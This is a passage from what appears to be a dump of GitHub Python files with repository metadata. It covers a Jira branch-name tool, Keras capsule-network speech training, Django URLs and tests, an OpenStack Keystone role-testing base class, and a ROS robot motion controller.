Iterable[str], jira_client: Optional[JIRA] = None) -> List[Issue]:\n    jira_client = jira_client or get_jira_client()\n    return jira_client.search_issues(f\"key in ({','.join(str(key) for key in keys)})\")\n\n\ndef get_issue(key: str, jira_client: Optional[JIRA] = None) -> Issue:\n    jira_client = jira_client or get_jira_client()\n    return jira_client.issue(key)\n\n\ndef make_names(ticket_no_list: List[str]):\n    issues = get_issues(ticket_no_list)\n    for issue in issues:\n        ticket_no = issue.key\n        summary_origin = issue.fields.summary\n        summary_trans = translator.translate(summary_origin, dest='en')\n        suggested_name 
= branchname_maker(ticket_no, summary_trans.text)\n print(f\"{ticket_no}\\n\\t- origin:\\t\\\"{summary_origin}\\\"\\n\\t- result:\\t\\\"{suggested_name}\\\"\")\n\n\ndef make_name(ticket_no: str):\n issue = get_issue(ticket_no)\n summary_origin = issue.fields.summary\n summary_trans = translator.translate(summary_origin, dest='en')\n suggested_name = branchname_maker(ticket_no, summary_trans.text)\n\n answer = input(f\"suggested name is: \\\"{suggested_name}\\\". copy this? (y/n): \")\n if answer.upper() in ('Y', 'YES', '네', '넵', '넹', 'DD', '', 'D'):\n os.system(f\"echo '{suggested_name}' | pbcopy\")\n print(\"copied!\")\n else:\n print(\"bye\")\n\n\ndef main(argv):\n if len(argv) == 1:\n make_name(argv[0])\n else:\n make_names(argv)\n\n\nif __name__ == \"__main__\":\n argc = len(sys.argv)\n if argc <= 1:\n sys.stderr.write(\"[ERROR] At least 1 argument needed: ticket number\\n\")\n exit(-1)\n for i in range(1, argc):\n if not varify_ticket_format(sys.argv[i]):\n sys.stderr.write(f\"[ERROR] Ticket format error : {sys.argv[i]}\\n\")\n exit(-1)\n main(sys.argv[1:])\n","repo_name":"hyunwook-kim-dhk/branch_name_maker","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"26737745743","text":"###########################\n# Capsule Network Main.py #\n###########################\n\nimport tensorflow as tf\nfrom tqdm import tqdm\nimport numpy as np\nfrom termcolor import colored, cprint\nimport time, os, sys, scipy\nsys.path.append('../')\n# User\nfrom core.data_utils import load_specific_noisy_data, load_random_noisy_data, DATA, Dimension, compare_weight_similarity\nimport core.data_utils as du\nfrom core.args import parameter_print, args\nfrom core.analysis import Analysis, TSNE_\nfrom capsulenet import CapsNet_WithDecoder, margin_loss, CapsNet_NoDecoder, wieght_similarity\nfrom core.data_utils import load_specific_noisy_data\n# keras\nfrom keras.utils import multi_gpu_model\nfrom keras import callbacks, layers, optimizers\nfrom keras import backend as K\n\nnoise_list = ['doing_the_dishes_SNR5','dude_miaowing_SNR5','exercise_bike_SNR5','pink_noise_SNR5','running_tap_SNR5','white_noise_SNR5']\ndef train(multi_model, data, save_path, args):\n trX, trY, vaX, vaY = data\n print(str(trX.shape),str(trY.shape),str(vaX.shape),str(vaY.shape))\n \n multi_model.compile(optimizer=optimizers.Adam(lr=args.learning_rate),\n loss=[margin_loss, 'mse'],\n loss_weights=[1., args.lam_recon],\n metrics=['accuracy']) \n # callbacks\n log = callbacks.CSVLogger(save_path + '/log.csv')\n checkpoint = callbacks.ModelCheckpoint(save_path + '/weights-{epoch:03d}.h5py', monitor='val_capsnet_acc',\n save_best_only=True, save_weights_only=True, verbose=1)\n earlystop = callbacks.EarlyStopping(monitor='val_decoder_acc', min_delta=0, patience=10, verbose=1, mode='auto')\n #lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: args.learning_rate * (0.9 ** args.num_epoch))\n #tb = callbacks.TensorBoard(log_dir=save_path + '/tensorboard-logs',\n # batch_size=args.batch_size, histogram_freq=args.debug)\n\n multi_model.fit([trX, trY],[trY,trX],\n batch_size=args.batch_size, epochs=args.num_epoch,\n #validation_split = 0.1,\n validation_data=[[vaX,vaY],[vaY,vaX]], \n shuffle = True,\n callbacks=[log, checkpoint, earlystop])\n \n\ndef train_NoDecoder(multi_model, data, save_path, args):\n trX, trY, vaX, vaY = data\n print(str(trX.shape),str(trY.shape),str(vaX.shape),str(vaY.shape))\n 
\n if args.ex_name == 'best':\n multi_model.compile(optimizer=optimizers.SGD(lr=args.learning_rate),\n loss=[margin_loss],\n metrics=['accuracy']) \n else: \n multi_model.compile(optimizer=optimizers.Adam(lr=args.learning_rate),\n loss=[margin_loss],\n metrics=['accuracy']) \n # callbacks\n log = callbacks.CSVLogger(save_path + '/log.csv')\n checkpoint = callbacks.ModelCheckpoint(save_path + '/weights-{epoch:03d}.h5py', monitor='val_acc',\n save_best_only=True, save_weights_only=True, verbose=1)\n earlystop = callbacks.EarlyStopping(monitor='val_acc', min_delta=0, patience=10, verbose=1, mode='auto')\n #tb = callbacks.TensorBoard(log_dir=save_path + '/tensorboard-logs',\n # batch_size=args.batch_size, histogram_freq=args.debug)\n #lr_decay = callbacks.LearningRateScheduler(schedule=lambda epoch: args.learning_rate * (0.9 ** args.num_epoch))\n\n multi_model.fit(trX, trY,\n batch_size=args.batch_size, epochs=args.num_epoch,\n #validation_split = 0.1,\n validation_data=[vaX,vaY], \n shuffle = True,\n callbacks=[log, checkpoint, earlystop])\n\n\ndef test(model, data, args):\n start_time = time.time()\n teX,teY = data\n print('-'*20 + 'Begin: test with ' + '-'*20)\n y_pred = md.predict(teX,batch_size=args.batch_size)\n\n # Weight_similarity\n if args.weight_similarity:\n print(y_pred.shape)\n Array1,Array2, Sim = du.compare_weight_similarity(teY,y_pred,label1=0,label2=24,label3=25,plot=args.wsplot)\n cprint(Sim,'blue')\n\n # Test with 30 labels\n label30_acc = float(np.sum(np.argmax(y_pred, 1) == np.argmax(teY, 1)))/float(teY.shape[0])\n print('Test with 30 labels acc:', label30_acc )\n A = np.argmax(y_pred, 1)\n B = np.argmax(teY, 1)\n assert A.shape[0] == B.shape[0]\n du.pick_mis_recognized(B,A,label2=24,label3=25)\n \n # Test with 21 labels\n sub_label = [0,1,2,3,9,10,12,20,24,27]\n for i in range(A.shape[0]):\n if A[i] in sub_label: A[i] = 0\n if B[i] in sub_label: B[i] = 0\n label21_acc = float(np.sum(A == B))/float(teY.shape[0])\n end_time = time.time()\n print('Test with 21 labels acc:', label21_acc)\n \n # Test with 10 labels\n sub_label = [0,1,2,3,5,6,7,9,10,12,13,17,19,20,21,23,24,25,27,29]\n for i in range(A.shape[0]):\n if A[i] in sub_label: A[i] = 0\n if B[i] in sub_label: B[i] = 0\n label10_acc = float(np.sum(A == B))/float(teY.shape[0])\n print('Test with 10 labels acc:' + str(label10_acc))\n print('Time: ' + str(end_time-start_time))\n print('-'*20 + 'End: test' + '-'*20)\n return label30_acc, label21_acc\n\n\nif __name__ == \"__main__\":\n args = args()\n ex_name = args.ex_name+'_'+args.train_with+'_'+args.test_with\n parameter_print(args,ex_name=ex_name,ModelType=\"CapsuleNet\")\n save_path = os.path.join(args.project_path,'save',args.model,ex_name)\n cprint('save_path: '+str(save_path),'yellow')\n if args.is_training == 'TEST' and args.SNR == None:\n raise ValueError('For TEST you should set SNR')\n\n # Data load\n data = DATA(args.is_training, args.train_with, args.test_with,\n args.data_path, feature_len=args.feature_len, mode=args.mode,dimension=args.dimension) #[sample,99,40,3]\n X,Y = data[0],data[1]\n\n # Define Model\n cprint(str(len(np.unique(np.argmax(Y, 1)))), 'red')\n with tf.device('/cpu:0'):\n if args.decoder == 1:\n model, eval_model, manipulate_model = CapsNet_WithDecoder(input_shape=X.shape[1:],\n n_class=len(np.unique(np.argmax(Y, 1))),\n kernel=args.kernel,\n primary_channel=args.primary_channel,\n primary_veclen=args.primary_veclen,\n digit_veclen = args.digit_veclen,\n dropout = args.dropout,\n routings=args.routings,\n decoderParm=(args.NumDecoderLayer,\n 
[args.DecoderLayer1,args.DecoderLayer2,args.DecoderLayer3]\n ),\n model_size_info=args.model_size_info)\n else:\n model = CapsNet_NoDecoder(input_shape=X.shape[1:],\n n_class=len(np.unique(np.argmax(Y, 1))),\n kernel=args.kernel,\n primary_channel=args.primary_channel,\n primary_veclen=args.primary_veclen,\n digit_veclen = args.digit_veclen,\n dropout = args.dropout,\n routings=args.routings,\n model_size_info=args.model_size_info)\n if args.weight_similarity: model = wieght_similarity(input_shape=X.shape[1:], n_class=len(np.unique(np.argmax(Y, 1))),kernel=args.kernel)\n model.summary()\n multi_model = multi_gpu_model(model, gpus=args.gpus)\n\n # Save path and load model\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n if args.keep and not args.weight_similarity: # init the model weights with provided one\n cprint('load weight from:' + save_path + '/weights-%03d.h5py'%args.keep, 'yellow')\n multi_model.load_weights(save_path + '/weights-%03d.h5py'% args.keep)\n #model.load(save_path)\n elif args.keep and args.weight_similarity:\n cprint('weight_similarity','yellow')\n cprint('load weight from:' + save_path + '/weights-%03d.h5py'%args.keep, 'yellow')\n multi_model.load_weights(save_path + '/weights-%03d.h5py'% args.keep,by_name=True)\n else:\n if args.ex_name == 'best':\n cprint('load weight from:' + '/home/jsbae/STT2/KWS/save/CapsNet/0320_digitvec4_clean_clean/weights-012.h5py', 'yellow')\n multi_model.load_weights('/home/jsbae/STT2/KWS/save/CapsNet/0320_digitvec4_clean_clean/weights-012.h5py')\n else:\n cprint('save weight to: ' + save_path, 'yellow')\n\n # Model training or testing\n if args.is_training == 'TRAIN':\n if args.decoder == 1:\n train(multi_model,data=data,save_path=save_path,args=args)\n else:\n train_NoDecoder(multi_model,data=data,save_path=save_path,args=args)\n model.save_weights(save_path + '/trained_model.h5py')\n print('Trained model saved to \\'%s/trained_model.h5py\\'' % save_path)\n elif args.is_training == 'TEST':\n if args.keep == 0:\n raise ValueError('No weights are provided.')\n else:\n test_result = save_path + '/test_result.csv'\n fd_test_result = open(test_result,'a')\n fd_test_result.write('test on epoch '+str(args.keep)+'SNR'+str(args.SNR)+' dimension:'+str(args.dimension)+'\\n')\n fd_test_result.write('test_mode,label30_acc,label21_acc\\n')\n # clean test\n print('*'*30 + 'clean exp' + '*'*30) \n label30_acc, label21_acc = test(multi_model, data=data,args=args)\n fd_test_result.write('clean,'+str(label30_acc)+','+str(label21_acc)+'\\n')\n fd_test_result.flush()\n for i in range(6):\n print('*'*30 + 'Noisy '+ str(i+2) +' exp' + '*'*30) \n if args.test_by=='noise':teX, teY = load_specific_noisy_data(args.data_path, 'TEST', args.mode, args.feature_len, noise_list[i]);cprint(noise_list[i],'red')\n elif args.test_by=='echo':teX, teY = load_specific_noisy_data(args.data_path, 'TEST', args.mode, args.feature_len, 'echo');cprint('echo','red')\n else: teX, teY = load_random_noisy_data(args.data_path,'TEST',args.mode, args.feature_len, SNR=args.SNR)\n teX = Dimension(teX,args.dimension)#teX = np.expand_dims(teX[:,:,:,1],axis=3)\n data = (teX, teY)\n label30_acc, label21_acc = test(multi_model, data=data,args=args)\n fd_test_result.write('noisy'+str(i)+','+str(label30_acc)+','+str(label21_acc)+'\\n')\n fd_test_result.flush()\n fd_test_result.close()\n else:\n raise ValueError('Wrong is_training value')#'could not find %c in %s' % (ch,str)) \n# Code end\n# For not decreasing issue: 
https://github.com/XifengGuo/CapsNet-Keras/issues/48\n\n\n\n\n","repo_name":"JaesungBae/Speech-Command-Recognition-with-Capsule-Network","sub_path":"CapsNet/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11199,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"30121795413","text":"\"\"\"\nGiven an array A of N integers, classify it as being Good Bad or Average. It is called Good, if it contains exactly X distinct integers, Bad if it contains less than X distinct integers and Average if it contains more than X distinct integers.\n\nInput format:\nFirst line consists of a single integer T denoting the number of test cases.\nFirst line of each test case consists of two space separated integers denoting N and X.\nSecond line of each test case consists of N space separated integers denoting the array elements.\n\nOutput format:\nPrint the required answer for each test case on a new line.\n\"\"\"\n\n\nt=int(input())\nfor z in range(0,t):\n a=list(map(int,input().split()))\n n=a[0]\n x=a[1]\n a=list(map(int,input().split()))\n temp=[]\n for i in range(0,n):\n if a[i] not in temp:\n temp.append(a[i])\n if len(temp)==x:\n print(\"Good\")\n elif len(temp)>x:\n print(\"Average\")\n else:\n print(\"Bad\")","repo_name":"Pal9k/myPrograms","sub_path":"Python/codearena18.py","file_name":"codearena18.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1220271323","text":"\r\n\r\ndef cbam_block(tensor, ratio=8, activation='relu'):\r\n from keras import layers\r\n import keras.backend as K\r\n channel = tensor.shape[-1]\r\n\t\r\n avg_pool = layers.GlobalAveragePooling2D()(tensor) \r\n avg_pool = layers.Reshape((1,1,channel))(avg_pool)\r\n avg_pool = layers.Dense(channel//ratio, activation= activation)(avg_pool)\r\n avg_pool = layers.Dense(channel, kernel_initializer='he_normal')(avg_pool)\r\n \r\n max_pool = layers.GlobalMaxPooling2D()(tensor)\r\n max_pool = layers.Reshape((1,1,channel))(max_pool)\r\n max_pool = layers.Dense(channel//ratio, activation= activation)(max_pool)\r\n max_pool = layers.Dense(channel, kernel_initializer='he_normal')(max_pool)\r\n \r\n channel_att = layers.add([avg_pool,max_pool])\r\n channel_att = layers.core.Activation('sigmoid')(channel_att)\r\n channel_att= layers.multiply([tensor, channel_att])\r\n \r\n #spatial attention\r\n avg_pool = layers.Lambda(lambda x: K.mean(x, axis=3, keepdims=True))(channel_att)\r\n max_pool = layers.Lambda(lambda x: K.max(x, axis=3, keepdims=True))(channel_att)\r\n concat = layers.concatenate([avg_pool, max_pool], axis= -1)\r\n spatial_att = layers.Conv2D(filters = 1,\r\n kernel_size=7,\r\n strides=1,\r\n padding='same',\r\n activation='sigmoid')(concat)\t\r\n \r\n return layers.multiply([channel_att, spatial_att])\r\n","repo_name":"faisalfuadn/CNN","sub_path":"cbam_block.py","file_name":"cbam_block.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70941002065","text":"from django.conf.urls import url\nimport views\n\nurlpatterns = [\n url(r'^register/$', views.register, name='register'),\n url(r'^profile/$', views.profile, name='profile'),\n url(r'^login/$', views.login, name='login'),\n url(r'^accounts/login/$', views.login, name='accounts_login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^cancel_subscription/$', views.cancel_subscription, 
name='cancel_subscription'),\n    url(r'^resetuser/$', views.reset_user, name='resetuser'),\n    url(r'^reset/$', views.reset, name='reset'),\n    url(r'^subscription_webhook/$', views.subscriptions_webhook, name='subscription_webhook'),\n\n]","repo_name":"Code-Institute-Submissions/Stream-3-final","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19985323885","text":"from django.test import TestCase\n\nfrom django.test import SimpleTestCase\nfrom django.urls import reverse, resolve\nfrom linkcutter.views import jump_to_target, cutter\nfrom linkcutter.models import Links\n\n\nclass TestUrls(SimpleTestCase):\n\n    def test_cutter(self):\n        url = reverse('linkcutter:cutter')\n        self.assertEqual(resolve(url).func, cutter)\n\n\nclass SimpleTest(TestCase):\n\n    def test_index(self):\n        \"\"\" The index page loads properly \"\"\"\n        response = self.client.get('/', follow=True)\n        self.assertEqual(response.status_code, 200)\n\n    def test_redirect_if_link_not_existed_in_db(self):\n        response = self.client.get('/somelink123', follow=True)\n        text = response.content\n        # str.find() returns -1 (truthy) when absent, so assertIn is the correct check\n        self.assertIn(b\"Such link doesn't exist\", text)\n\n    def test_redirect_if_not_logged_in(self):\n        response = self.client.get(reverse('linkcutter:link_list'))\n        self.assertRedirects(response, '/login/?next=/link_list/')\n","repo_name":"Sakhm3t/ShortLinks","sub_path":"linkcutter/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72571393425","text":"#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport contextlib\nimport json\nimport mock\nimport os\nimport random\nimport string\nimport subprocess\nimport unittest\n\nfrom kpr.utils import clients\n\n\ndef id_generator(\n size=8,\n chars=string.ascii_uppercase + string.ascii_lowercase + string.digits\n ):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef getid(obj):\n \"\"\"Return id if argument is a Resource.\n\n Abstracts the common pattern of allowing both an object or an object's ID\n (UUID) as a parameter when dealing with relationships.\n \"\"\"\n try:\n if obj.uuid:\n return obj.uuid\n except AttributeError: # nosec(cjschaef): 'obj' doesn't contain attribute\n # 'uuid', return attribute 'id' or the 'obj'\n pass\n try:\n return obj.id\n except AttributeError:\n return obj\n\n\nclass TestCase(unittest.TestCase):\n\n @contextlib.contextmanager\n def grant_role_temporary(self, target_role, user, project):\n try:\n self.admin.roles.grant(\n target_role,\n user=user,\n project=project\n )\n yield\n except Exception as e:\n pass\n finally:\n self.admin.roles.revoke(\n target_role,\n user=user,\n project=project\n )\n\n @contextlib.contextmanager\n def create_user_and_cleanup(self, project, username, role):\n user = username\n try:\n user = self.create_user(project, username, role)\n yield user\n except Exception as e:\n raise e\n finally:\n self.delete_user(project, user, role)\n\n def create_admin_auditor(self):\n project = self.admin.projects.find(\n name=clients.OS_ADMIN_PROJECT_NAME\n )\n username = 'admin-auditor-{}'.format(id_generator())\n return self.create_user(project, username, self.cloud_admin_auditor_role)\n\n def delete_admin_auditor(self, user, force=True):\n project = self.admin.projects.find(\n name=clients.OS_ADMIN_PROJECT_NAME\n )\n self.delete_user(project, user, self.cloud_admin_auditor_role, force=force)\n\n def create_user(self, project, username, role):\n user = self.admin.users.create(\n username,\n domain=clients.OS_USER_DOMAIN_ID,\n default_project=project,\n password=clients.OS_PASSWORD,\n )\n self.admin.roles.grant(\n role,\n user=user,\n project=project,\n )\n return user\n\n def delete_user(self, project, user, role, force=True):\n try:\n self.admin.roles.revoke(\n role,\n user=user,\n project=project,\n )\n except Exception as e:\n pass\n try:\n self.admin.users.delete(user)\n except Exception as e:\n if not force:\n raise e\n\n def os_run_text(\n self,\n command=['user', 'list'],\n project='admin',\n username='admin',\n format='json',\n ):\n args = ['openstack'] + command\n if format:\n args = args + ['-f', format]\n\n return subprocess.check_output(\n args,\n stderr=subprocess.STDOUT,\n env=self.get_os_env(project=project, username=username)\n )\n\n def os_run(\n self,\n command=['user', 'list'],\n project='admin',\n username='admin',\n format='json',\n ):\n return json.loads(self.os_run_text(\n command=command,\n project=project,\n username=username,\n format=format,\n ).decode('utf-8'))\n\n def get_os_env(self, project='admin', username='admin'):\n return {\n 'OS_AUTH_URL': clients.OS_AUTH_URL,\n 'OS_IDENTITY_API_VERSION': '3',\n 'OS_NO_CACHE': '1',\n 'OS_PASSWORD': clients.OS_PASSWORD,\n 'OS_PROJECT_DOMAIN_ID': clients.OS_PROJECT_DOMAIN_ID,\n 'OS_PROJECT_NAME': project,\n 'OS_REGION_NAME': clients.OS_REGION_NAME,\n 'OS_USERNAME': username,\n 'OS_USER_DOMAIN_ID': clients.OS_USER_DOMAIN_ID,\n 'OS_VOLUME_API_VERSION': '2',\n 'PATH': os.environ['PATH'],\n }\n\n def 
setUp(self):\n super(TestCase, self).setUp()\n self.addCleanup(mock.patch.stopall)\n self.admin = clients.get_admin_client()\n self.cloud_admin_role = self.admin.roles.find(\n name='admin'\n )\n self.cloud_admin_auditor_role = self.admin.roles.find(\n name='admin_auditor'\n )\n self.project_admin_role = self.admin.roles.find(\n name='project_admin'\n )\n self.project_auditor_role = self.admin.roles.find(\n name='project_auditor'\n )\n self.project_member_role = self.admin.roles.find(\n name='Member'\n )\n self.admin_auditor = self.create_admin_auditor()\n\n def tearDown(self):\n super(TestCase, self).tearDown()\n self.delete_admin_auditor(self.admin_auditor)\n\n def setup_project(\n self,\n project='project1',\n admin=True,\n auditor=False,\n user=2\n ):\n try:\n project_name = '{}-{}'.format(project, id_generator())\n project_instance = self.admin.projects.create(\n project_name,\n clients.OS_PROJECT_DOMAIN_ID\n )\n setattr(\n self,\n project,\n project_instance\n )\n except Exception as e:\n pass\n\n if admin:\n self.setup_project_admin(project)\n if auditor:\n self.setup_project_auditor(project)\n\n self.setup_project_user(project, user)\n\n def get_role_by_name(self, role='admin'):\n return {\n 'admin': self.project_admin_role,\n 'auditor': self.project_auditor_role,\n }[role]\n\n def setup_project_admin_or_auditor(self, project='project1', role='admin'):\n try:\n user = '{}_{}'.format(project, role)\n user_name = '{}-{}'.format(user, id_generator())\n project_instance = getattr(self, project)\n role = self.get_role_by_name(role)\n\n user_instance = self.create_user(\n project_instance,\n user_name,\n role\n )\n setattr(\n self,\n user,\n user_instance\n )\n except Exception as e:\n pass\n\n def setup_project_admin(self, project='project1'):\n self.setup_project_admin_or_auditor(project=project, role='admin')\n\n def setup_project_auditor(self, project='project1'):\n self.setup_project_admin_or_auditor(project=project, role='auditor')\n\n def setup_project_user(self, project='project1', user=2):\n try:\n project_user = '{}_user'.format(project)\n project_instance = getattr(self, project)\n\n for i in range(user):\n _project_user = '{}{}'.format(project_user, i)\n _project_user_name = '{}-{}'.format(\n _project_user, id_generator())\n _project_user_instance = self.create_user(\n project_instance,\n _project_user_name,\n self.project_member_role\n )\n setattr(\n self,\n _project_user,\n _project_user_instance,\n )\n except Exception as e:\n pass\n\n def teardown_project(\n self,\n project='project1',\n admin=True,\n auditor=False,\n user=2\n ):\n project_instance = getattr(self, project)\n if admin:\n self.teardown_project_admin(project)\n if auditor:\n self.teardown_project_auditor(project)\n\n self.teardown_project_user(project, user)\n try:\n self.admin.projects.delete(project_instance)\n except Exception as e:\n pass\n\n def teardown_project_admin_or_auditor(self, project='project1', role='admin'):\n project_instance = getattr(self, project)\n user = '{}_{}'.format(project, role)\n user = getattr(self, user)\n role = self.get_role_by_name(role)\n\n self.delete_user(\n project_instance,\n user,\n role,\n )\n\n def teardown_project_admin(self, project='project1'):\n self.teardown_project_admin_or_auditor(project=project, role='admin')\n\n def teardown_project_auditor(self, project='project1'):\n self.teardown_project_admin_or_auditor(project=project, role='auditor')\n\n def teardown_project_user(self, project='project1', user=2):\n project_instance = getattr(self, project)\n 
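# editor's note: setup_project_user stored each member on self under names\n        # like '{project}_user0', '{project}_user1', ... via setattr; the loop below\n        # rebuilds those names with getattr and revokes/deletes each user\n        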
project_user = '{}_user'.format(project)\n\n for i in range(user):\n _project_user = '{}{}'.format(project_user, i)\n _project_user = getattr(self, _project_user)\n self.delete_user(\n project_instance,\n _project_user,\n self.project_member_role,\n )\n","repo_name":"yuanying/keystone-policy-research","sub_path":"kpr/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":9830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7276846674","text":"\"\"\"empty message\n\nRevision ID: e8671bf828e7\nRevises: b7e5d22ea591\nCreate Date: 2022-05-30 09:38:23.375908\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e8671bf828e7'\ndown_revision = 'b7e5d22ea591'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('ruta', sa.Column('colonias', sa.ARRAY(sa.String()), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('ruta', 'colonias')\n # ### end Alembic commands ###\n","repo_name":"WastyFace/APISUX","sub_path":"APISUX/migrations/versions/e8671bf828e7_.py","file_name":"e8671bf828e7_.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12470738945","text":"from django.urls import path \nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('about', views.about, name='about'),\n path('termsAndConditions', views.termsAndConditions, name='termsAndConditions'),\n path('cookiePolicy', views.cookiePolicy, name='cookiePolicy'),\n path('privacyPolicy', views.privacyPolicy, name='privacyPolicy'),\n path('FAQ', views.FAQ, name='FAQ'),\n path('cart', views.cart, name='cart')\n]","repo_name":"JackReynolds/PremierCompetitions","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1479686712","text":"#!/usr/bin/env python\n# license removed for brevity\nimport numpy as np\nimport rospy\nimport sys, termios, tty\nimport random\nfrom math import radians, degrees\nfrom ca_msgs.msg import Bumper\nimport getpass\nimport time\nfrom geometry_msgs.msg import Twist\n\n\nclass create2_motion_controller(object):\n \"\"\"\n docstring for create2_motion_controller\n\n note: improve evasion to be smarter\n make manual (optional)\n\n\n \"\"\"\n def __init__(self):\n self.control_pub = rospy.Publisher(\"cmd_vel\", Twist, queue_size = 30)\n self.state_sub = rospy.Subscriber(\"bumper\", Bumper, self.robot_motion) #original_freq = 10hz\n self.rate = rospy.Rate(10)\n self.eva = False\n #not sure for get_param\n #self.lin = rospy.get_param('~linVel', .2)\n #self.ang = rospy.get_param('~angVel', 1.0)\n self.lin = 0.1\n self.ang = 0.4\n self.evasion_time = 0\n self.end_node = time.time() + (60 * 5)\n self.compname = getpass.getuser()\n self.f = open(\"/home/\"+ self.compname +\"/catkin_ws/ros_colo_dataset/Robot1_Odometry_c\"+str(time.time())+\".dat\", \"w+\")\n self.f.write(\"# Time [sec] \\t Velocity [m/s] \\t Angular Velocity [rad/s] \\n\")\n self.movement_bindings = {\n 'i':(1,0,0,0),\n 'o':(1,0,0,-1),\n 'j':(0,0,0,1),\n 'l':(0,0,0,-1),\n 'u':(1,0,0,1),\n ',':(-1,0,0,0),\n '.':(-1,0,0,1),\n 'm':(-1,0,0,-1),\n }\n self.twist = Twist()\n\n 
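# Editor's sketch of the avoidance flow implemented in robot_motion below\n    # (read from this file, no new behaviour is introduced):\n    #   bumper/light barrier hit -> backoff(), then arm a ~3 s evasion timer\n    #   timer still running      -> evasion(): reverse at -0.1 m/s, turn at -0.2 rad/s\n    #   otherwise                -> random_movement(): small random velocity jitter\n\n    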
def twist_msgs(self, lin_vel, ang_vel):\n rtime = time.time()\n self.f.write(str(rtime) + '\\t\\t' +str(lin_vel) + '\\t\\t' + str(ang_vel) + '\\n')\n print(str(rtime) + '\\t\\t' +str(lin_vel) + '\\t\\t' + str(ang_vel) + '\\n')\n\n def movements(self, key, linear, angular):\n x = self.movement_bindings[key][0]\n y = self.movement_bindings[key][1]\n z = self.movement_bindings[key][2]\n th = self.movement_bindings[key][3]\n twist = Twist()\n twist.linear.x = x*linear; twist.linear.y = y*linear; twist.linear.z = z*linear;\n twist.angular.x = 0; twist.angular.y = 0; twist.angular.z = th*angular\n self.control_pub.publish(twist)\n\n def smooth_movements(self, linear_vel, angular_vel):\n\n '''\n control_input = [linear_vel, angular_vel]\n self.twist.linear.x = 0 # [pos: forward velocity\n self.twist.linear.y = 0 # no effects\n self.twist.linear.z = 0 # no effects\n self.twist.angular.x = 0 # no effects\n self.twist.angular.y = 0 # no effects\n self.twist.angular.z = 0.5 # angular velocity pos: counter-clock\n '''\n if 0.2 > linear_vel > 0:\n self.twist.linear.x = linear_vel\n elif linear_vel <= 0:\n self.twist.linear.x = 0\n else:\n self.twist.linear.x = 0.2\n\n if 0.1 > angular_vel > -0.1:\n self.twist.angular.z = angular_vel\n elif angular_vel > 0.1:\n self.twist.angular.z = 0.1\n else:\n self.twist.angular.z = -0.1\n\n self.twist.linear.x = 0.1\n self.twist.angular.z = 0\n\n\n self.twist_msgs(self.twist.linear.x, self.twist.angular.z)\n self.control_pub.publish(self.twist)\n\n\n def manual_control(self, manual_input):\n pass\n\n def backoff(self, barriers):\n print(\"backoff\")\n linear_vel = self.twist.linear.x\n angular_vel = self.twist.angular.z\n\n linear_vel = (linear_vel-0.1)/2\n angular_vel = (angular_vel - 0.2)/2\n\n self.twist.linear.x = linear_vel\n self.twist.angular.z = angular_vel\n print(\"back 0: \", self.twist)\n self.control_pub.publish(self.twist)\n self.twist_msgs(self.twist.linear.x, self.twist.angular.z) \n\n '''\n linear_vel = -0.1\n if barriers[0]: # barrier on the left:\n angular_vel = -0.2\n elif barriers[1]:\n angular_vel = -0.1\n elif barriers[2]:\n angular_vel = 0.2\n self.twist.linear.x = linear_vel\n self.twist.angular.z = angular_vel\n print(\"back 1: \", self.twist)\n self.control_pub.publish(self.twist)\n self.twist_msgs(self.twist.linear.x, self.twist.angular.z)\n '''\n def evasion(self, barriers):\n print(\"evasion\")\n linear_vel = -0.1\n angular_vel = -0.2\n self.twist.linear.x = linear_vel\n self.twist.angular.z = angular_vel\n print(\"back 0: \", self.twist)\n self.control_pub.publish(self.twist)\n self.twist_msgs(self.twist.linear.x, self.twist.angular.z)\n\n def random_movement(self):\n print(\"Movement\")\n delta_vel = random.uniform(-0.02, 0.02)\n delta_ang_vel = random.uniform(-0.07, 0.07)\n self.smooth_movements(self.twist.linear.x+delta_vel, self.twist.angular.z+delta_ang_vel)\n\n def robot_motion(self, data):\n if time.time() > self.end_node:\n exit()\n lef = data.is_light_left\n lefron = data.is_light_front_left\n lefcen = data.is_light_center_left\n rigcen = data.is_light_center_right\n rigfron = data.is_light_front_right\n rig = data.is_light_right\n\n bumper_l = data.is_left_pressed\n bumper_r = 